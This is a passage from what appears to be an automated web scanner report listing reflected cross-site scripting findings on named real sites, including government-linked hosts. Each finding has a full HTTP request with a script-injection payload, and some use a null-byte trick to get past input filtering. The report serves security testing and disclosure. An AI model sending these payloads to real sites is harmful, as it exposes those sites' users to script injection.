
Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: vsid=9kuM6onKqeiW;Path=/;Domain=.providesupport.com
Content-Length: 4989
Date: Sat, 30 Apr 2011 22:10:04 GMT
Connection: close

var psMygbsid = "9kuM6onKqeiW";
// safe-standard@gecko.js

var psMygbiso;
try {
   psMygbiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psMygbwid != null);
} catch(e) {
   psMygb
...[SNIP]...
bco() {
   var w1 = psMygbci.width - 1;
   psMygbol = (w1 & 1) != 0;
   psMygbsb(psMygbol ? "http://www.ehawaii.gov/dakine/images/portal-online.gif" : "http://www.ehawaii.gov/dakine/images/portal-offline.gif44157";alert(1)//7ed92f9d11a");
   psMygbscf((w1 & 2) != 0);
   var h = psMygbci.height;
   if (h != 2) {
       psMygbop = false;
   } else if ((h == 2) && (!psMygbop)) {
       psMygbop = true;
       psMygbsi();
   }
}
var psMygbci = new Image();
psMy
...[SNIP]...

3.46. http://image.providesupport.com/js/hic/safe-standard.js [online-image parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/hic/safe-standard.js

Issue detail

The value of the online-image request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1c28"%3balert(1)//0fbcdd205b5 was submitted in the online-image parameter. This input was echoed as d1c28";alert(1)//0fbcdd205b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/hic/safe-standard.js?ps_h=Mygb&ps_t=1304201424421&online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gifd1c28"%3balert(1)//0fbcdd205b5&offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: vsid=egvv6GBH2Aoz;Path=/;Domain=.providesupport.com
Content-Length: 4905
Date: Sat, 30 Apr 2011 22:10:04 GMT
Connection: close

var psMygbsid = "egvv6GBH2Aoz";
// safe-standard@gecko.js

var psMygbiso;
try {
   psMygbiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psMygbwid != null);
} catch(e) {
   psMygb
...[SNIP]...
bd.innerHTML = '';
   }
}
var psMygbop = false;
function psMygbco() {
   var w1 = psMygbci.width - 1;
   psMygbol = (w1 & 1) != 0;
   psMygbsb(psMygbol ? "http://www.ehawaii.gov/dakine/images/portal-online.gifd1c28";alert(1)//0fbcdd205b5" : "http://www.ehawaii.gov/dakine/images/portal-offline.gif");
   psMygbscf((w1 & 2) != 0);
   var h = psMygbci.height;
   if (h != 2) {
       psMygbop = false;
   } else if ((h == 2) && (!psMygbop)) {
       psMygbop
...[SNIP]...

3.47. http://image.providesupport.com/js/hic/safe-textlink.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/hic/safe-textlink.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1fbe<script>alert(1)</script>2a480ed2356 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsf1fbe<script>alert(1)</script>2a480ed2356/hic/safe-textlink.js?ps_h=Njc9&ps_t=1304201773401&online-link-html=Live%20Chat%20Help&offline-link-html=Live%20Chat%20Help HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: image.providesupport.com

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sat, 30 Apr 2011 22:18:29 GMT
Content-Length: 565

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /jsf1fbe<script>alert(1)</script>2a480ed2356/hic/safe-textlink.js?ps_h=Njc9&ps_t=1304201773401&online-link-html=Live Chat Help&offline-link-html=Live Chat Help
</pre>
...[SNIP]...

3.48. http://image.providesupport.com/js/hic/safe-textlink.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://image.providesupport.com
Path:   /js/hic/safe-textlink.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 32c6b<a>696019657e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/hic32c6b<a>696019657e4/safe-textlink.js?ps_h=Njc9&ps_t=1304201773401&online-link-html=Live%20Chat%20Help&offline-link-html=Live%20Chat%20Help HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: image.providesupport.com

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sat, 30 Apr 2011 22:18:29 GMT
Content-Length: 551

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
Page: /js/hic32c6b<a>696019657e4/safe-textlink.js?ps_h=Njc9&ps_t=1304201773401&online-link-html=Live%20Chat%20Help&offline-link-html=Live%20Chat%20Help
</pre>
...[SNIP]...

3.49. http://iot.custhelp.com/cgi-bin/iot.cfg/php/enduser/opensearch.php [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iot.custhelp.com
Path:   /cgi-bin/iot.cfg/php/enduser/opensearch.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload %002a52b<script>alert(1)</script>bdcb3d65d59 was submitted in the callback parameter. This input was echoed as 2a52b<script>alert(1)</script>bdcb3d65d59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /cgi-bin/iot.cfg/php/enduser/opensearch.php?p_cv=&startIndex=0&count=3&format=json&callback=RNTFeed.readers[0].onCompleteJSON%002a52b<script>alert(1)</script>bdcb3d65d59 HTTP/1.1
Host: iot.custhelp.com
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:39:06 GMT
Server: Apache
P3P: policyref="http://iot.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Content-Length: 1083
RNT-Time: D=94886 t=1304127546706345
RNT-Machine: 02
X-Cnection: close
Content-Type: text/javascript; charset="utf-8"

RNTFeed.readers[0].onCompleteJSON.2a52b<script>alert(1)</script>bdcb3d65d59( {"Query":[{"role":"request","searchTerms":""}],"topic":[],"item":[{"link":"http:\/\/iot.custhelp.com\/cgi-bin\/iot.cfg\/php\/enduser\/std_adp.php?p_faqid=69&p_created=1175614633","title":"How do I fi
...[SNIP]...

3.50. http://iot.custhelp.com/cgi-bin/iot.cfg/php/enduser/opensearch.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iot.custhelp.com
Path:   /cgi-bin/iot.cfg/php/enduser/opensearch.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %001daec<script>alert(1)</script>9ac6432b159 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1daec<script>alert(1)</script>9ac6432b159 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /cgi-bin/iot.cfg/php/enduser/opensearch.php?p_cv=&startIndex=0&count=3&format=json&callback=RNTFeed.readers[0].onComplete/%001daec<script>alert(1)</script>9ac6432b159JSON HTTP/1.1
Host: iot.custhelp.com
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:40:07 GMT
Server: Apache
P3P: policyref="http://iot.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Content-Length: 1084
RNT-Time: D=93452 t=1304127607569699
RNT-Machine: 10
X-Cnection: close
Content-Type: text/javascript; charset="utf-8"

RNTFeed.readers[0].onComplete/.1daec<script>alert(1)</script>9ac6432b159JSON( {"Query":[{"role":"request","searchTerms":""}],"topic":[],"item":[{"link":"http:\/\/iot.custhelp.com\/cgi-bin\/iot.cfg\/php\/enduser\/std_adp.php?p_faqid=69&p_created=1175614633","title":"How do
...[SNIP]...

3.51. http://iot.custhelp.com/cgi-bin/iot.cfg/php/enduser/opensearch.php [startIndex parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iot.custhelp.com
Path:   /cgi-bin/iot.cfg/php/enduser/opensearch.php

Issue detail

The value of the startIndex request parameter is copied into the HTML document as plain text between tags. The payload %002165b<img%20src%3da%20onerror%3dalert(1)>a528da63fb2 was submitted in the startIndex parameter. This input was echoed as 2165b<img src=a onerror=alert(1)>a528da63fb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /cgi-bin/iot.cfg/php/enduser/opensearch.php?p_cv=&startIndex=0%002165b<img%20src%3da%20onerror%3dalert(1)>a528da63fb2&count=3&format=json&callback=RNTFeed.readers[0].onCompleteJSON HTTP/1.1
Host: iot.custhelp.com
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:38:12 GMT
Server: Apache
P3P: policyref="http://iot.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Content-Length: 1091
RNT-Time: D=114668 t=1304127492040349
RNT-Machine: 10
X-Cnection: close
Content-Type: text/javascript; charset="utf-8"

RNTFeed.readers[0].onCompleteJSON( {"Query":[{"role":"request","searchTerms":""}],"topic":[],"item":[{"link":"http:\/\/iot.custhelp.com\/cgi-bin\/iot.cfg\/php\/enduser\/std_adp.php?p_faqid=69&p_create
...[SNIP]...
RSS","link":"http:\/\/iot.custhelp.com\/cgi-bin\/iot.cfg\/php\/enduser\/std_alp.php","description":"RightNow Technologies Knowledgebase OpenSearch Feed (RSS)","totalResults":1372,"startIndex":"0\u00002165b<img src=a onerror=alert(1)>a528da63fb2","itemsPerPage":"3"} );

3.52. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c5b3"><script>alert(1)</script>40609c1b37a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?4c5b3"><script>alert(1)</script>40609c1b37a=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 30 Apr 2011 12:21:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 117123

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&4c5b3"><script>alert(1)</script>40609c1b37a=1" type="text/css" media="all" />
...[SNIP]...

3.53. http://kodakimagingnetworki.tt.omtrdc.net/m2/kodakimagingnetworki/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kodakimagingnetworki.tt.omtrdc.net
Path:   /m2/kodakimagingnetworki/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 3535b<script>alert(1)</script>46afbb97bb6 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/kodakimagingnetworki/mbox/standard?mboxHost=www.kodakgallery.com&mboxSession=1304176122561-938029&mboxPage=1304176122561-938029&screenHeight=1200&screenWidth=1920&browserWidth=998&browserHeight=935&browserTimeOffset=-300&colorDepth=16&mboxCount=2&sourceId=700019816903&mbox=LandingPageMbox3535b<script>alert(1)</script>46afbb97bb6&mboxId=0&mboxTime=1304158124644&mboxURL=http%3A%2F%2Fwww.kodakgallery.com%2Fgallery%2Flp%2F2010%2Fvisit_florida%2Fvacation_photos.jsp%3Fe81c7*%2Falert(document.cookie)%2F%2F4c687dfaa6f%3D1&mboxReferrer=http%3A%2F%2Fburp%2Fshow%2F43&mboxVersion=40 HTTP/1.1
Host: kodakimagingnetworki.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 211
Date: Sat, 30 Apr 2011 15:09:12 GMT
Server: Test & Target

mboxFactories.get('default').get('LandingPageMbox3535b<script>alert(1)</script>46afbb97bb6',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1304176122561-938029.17");

3.54. http://landmark-project.com/feed2js/feed2js.php [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://landmark-project.com
Path:   /feed2js/feed2js.php

Issue detail

The value of the src request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a8c7'%3balert(1)//d5298991925 was submitted in the src parameter. This input was echoed as 5a8c7';alert(1)//d5298991925 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feed2js/feed2js.php?src=http%3A%2F%2Fcoemergency.blogspot.com%2Ffeeds%2Fposts%2Fdefault5a8c7'%3balert(1)//d5298991925&num=5&date=y&html=p HTTP/1.1
Host: landmark-project.com
Proxy-Connection: keep-alive
Referer: http://dola.colorado.gov/dem/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:23:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Content-Length: 775
Content-Type: text/html; charset=UTF-8

document.write('<div class="rss-box">');
document.write('<p class="rss-item"><em>Error:</em> Feed failed! Causes may be (1) No data found for RSS feed http://coemergency.blogspot.com/feeds/posts/default5a8c7';alert(1)//d5298991925; (2) There are no items are available for this feed; (3) The RSS feed does not validate.<br />
...[SNIP]...

3.55. http://newbrowse.livehelper.com/servlet/lhBrowse [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newbrowse.livehelper.com
Path:   /servlet/lhBrowse

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a0096<img%20src%3da%20onerror%3dalert(1)>006acc3c9a9 was submitted in the REST URL parameter 2. This input was echoed as a0096<img src=a onerror=alert(1)>006acc3c9a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /servlet/lhBrowsea0096<img%20src%3da%20onerror%3dalert(1)>006acc3c9a9?ACTION=BTNREFRESH&RND=0.4528236691839993&p=Iowa.gov&c=1099892&b=company&g=Information%2520Services&op=&PAGEVISIT=true&r=1.442691869335249&a=Netscape&v=5&pl=Win32&dm=ia.gov&rf=http%3A//ia.gov/&tl=Iowa.gov%20LiveHelp&cs=true&pg=http%3A//ia.gov/livehelp.html&sd1=1156x1920&sd2=16&jsv=undefined&ps=&lot=1304161964473&ll=undefined&LC=1&pullFailed=0&nocache=0.2693614396266639&id=0&noCacheIE=1304161981692 HTTP/1.1
Host: newbrowse.livehelper.com
Proxy-Connection: keep-alive
Referer: http://ia.gov/livehelp.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: searsTest=TEST

Response

HTTP/1.1 404 Not found
Server: nginx/0.7.65
Date: Sat, 30 Apr 2011 11:22:15 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Content-Length: 101

Error. The file was not found. (servlet name = lhBrowsea0096<img src=a onerror=alert(1)>006acc3c9a9)

3.56. http://newbrowse.livehelper.com/servlet/lhBrowse [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://newbrowse.livehelper.com
Path:   /servlet/lhBrowse

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9383a<a>7d6250d00fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /servlet/lhBrowse9383a<a>7d6250d00fe HTTP/1.1
Host: newbrowse.livehelper.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: searsTest=TEST; st1099892=135396595z2011-04-30 06:12:09z;

Response

HTTP/1.1 404 Not found
Server: nginx/0.7.65
Date: Sat, 30 Apr 2011 12:23:35 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: close
Content-Length: 76

Error. The file was not found. (servlet name = lhBrowse9383a<a>7d6250d00fe)

3.57. http://newbrowse.livehelper.com/servlet/lhBrowse [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://newbrowse.livehelper.com
Path:   /servlet/lhBrowse

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 65f8b<a%20b%3dc>8434f8e4e43 was submitted in the REST URL parameter 2. This input was echoed as 65f8b<a b=c>8434f8e4e43 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /servlet/lhBrowse65f8b<a%20b%3dc>8434f8e4e43?ACTION=BTNINIT&c=1099892&b=company&g=Information%2520Services&op=&p=Iowa.gov&RND=0.4528236691839993&nocache=0.9521570026408881&id=0&noCacheIE=1304161966682 HTTP/1.1
Host: newbrowse.livehelper.com
Proxy-Connection: keep-alive
Referer: http://ia.gov/livehelp.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not found
Server: nginx/0.7.65
Date: Sat, 30 Apr 2011 11:12:55 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Content-Length: 80

Error. The file was not found. (servlet name = lhBrowse65f8b<a b=c>8434f8e4e43)

3.58. http://newbrowse.livehelper.com/servlet/lhBrowse [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newbrowse.livehelper.com
Path:   /servlet/lhBrowse

Issue detail

The value of the id request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 13e0d%3balert(1)//eb39e32ae0d was submitted in the id parameter. This input was echoed as 13e0d;alert(1)//eb39e32ae0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/lhBrowse?ACTION=BTNINIT&c=1099892&b=company&g=Information%2520Services&op=&p=Iowa.gov&RND=0.4528236691839993&nocache=0.9521570026408881&id=013e0d%3balert(1)//eb39e32ae0d&noCacheIE=1304161966682 HTTP/1.1
Host: newbrowse.livehelper.com
Proxy-Connection: keep-alive
Referer: http://ia.gov/livehelp.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 30 Apr 2011 11:12:40 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: ASP.NET
P3P: CP: PSAo OUR IND COM NAV INT STA NID DSP NOI COR
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: searsTest=TEST; domain=.livehelper.com
Content-Length: 199

var obj;var str ={"opstatus":0,"windowsize":1,"validity":1, "ispulled":null};obj = eval(str);var id = parseInt(013e0d;alert(1)//eb39e32ae0d);eval(pool[013e0d;alert(1)//eb39e32ae0d].getCallback(obj));

3.59. http://newchat.livehelper.com/servlet/lhChat [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newchat.livehelper.com
Path:   /servlet/lhChat

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ca390<img%20src%3da%20onerror%3dalert(1)>f446d719da6 was submitted in the REST URL parameter 2. This input was echoed as ca390<img src=a onerror=alert(1)>f446d719da6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /servlet/lhChatca390<img%20src%3da%20onerror%3dalert(1)>f446d719da6?ACTION=GETWINDOWSIZE&c=1099892&id=0&noCacheIE=1304161966682 HTTP/1.1
Host: newchat.livehelper.com
Proxy-Connection: keep-alive
Referer: http://ia.gov/livehelp.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not found
Server: nginx/0.7.65
Date: Sat, 30 Apr 2011 11:12:38 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Content-Length: 99

Error. The file was not found. (servlet name = lhChatca390<img src=a onerror=alert(1)>f446d719da6)

3.60. http://newchat.livehelper.com/servlet/lhChat [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newchat.livehelper.com
Path:   /servlet/lhChat

Issue detail

The value of the id request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 84b16%3balert(1)//9158bdd093c was submitted in the id parameter. This input was echoed as 84b16;alert(1)//9158bdd093c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/lhChat?ACTION=GETWINDOWSIZE&c=1099892&id=084b16%3balert(1)//9158bdd093c&noCacheIE=1304161966682 HTTP/1.1
Host: newchat.livehelper.com
Proxy-Connection: keep-alive
Referer: http://ia.gov/livehelp.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 30 Apr 2011 11:12:29 GMT
Content-Type: text/javascript
Connection: keep-alive
P3P: CP: PSAo OUR IND COM NAV INT STA NID DSP NOI COR
Content-Length: 132

var obj;var str ={"windowsize":1};obj = eval(str);var id = parseInt(084b16;alert(1)//9158bdd093c);eval(pool[id].setWindowSize(obj));

3.61. http://nv.gov/workarea/csslib/ektronCss.ashx [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nv.gov
Path:   /workarea/csslib/ektronCss.ashx

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 38767<script>alert(1)</script>6b4af41bd40 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/csslib/ektronCss.ashx?id=EktronModalCss+EktronThickBoxCss+EktronBubbleCss38767<script>alert(1)</script>6b4af41bd40 HTTP/1.1
Host: nv.gov
Proxy-Connection: keep-alive
Referer: http://nv.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=nv.gov&SiteLanguage=1033; EktGUID=e1ffd717-3c01-4362-9a5b-89256133fb8e; EkAnalytics=newuser; ASP.NET_SessionId=f4dzvey4cafeqrfxihsuhw45

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Type: text/css; charset=utf-8
